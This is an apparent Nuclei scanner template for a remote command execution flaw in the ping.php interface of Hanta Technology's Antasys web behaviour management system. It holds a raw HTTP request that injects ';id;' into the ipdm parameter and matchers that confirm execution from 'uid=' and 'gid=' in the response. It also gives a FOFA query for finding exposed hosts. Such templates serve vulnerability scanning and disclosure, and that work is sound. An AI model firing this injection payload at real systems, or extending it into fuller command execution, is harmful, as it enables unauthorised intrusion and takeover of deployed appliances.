http:
    - matchers:
        - condition: and
          part: body
          type: word
          words:
            - uid=
            - gid=
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /dgn/dgn_tools/ping.php?ipdm=127.0.0.1;id;&ps=64&cnt=1 HTTP/1.1
          Host: {{Hostname}}
          Priority: u=0, i
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
          Accept-Encoding: gzip, deflate
          Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
          Upgrade-Insecure-http: 1
id: hanta-ping_php-RCE
info:
    author: Superhero
    description: |-
        fofa: body="Antasys"
        汉塔科技-上网行为管理系统 ping.php 接口存在远程命令执行漏洞，经过身份验证的恶意攻击者可以利用该漏洞远程执行任意命令，获取系统权限
    name: 汉塔科技-上网行为管理系统 ping.php 远程命令执行漏洞
    reference:
        - https://mp.weixin.qq.com/s/Fp5H6ptwvxTmjL4wQ6fY3Q?token=1386604809&lang=zh_CN
    severity: high
    tags:
        - RCE
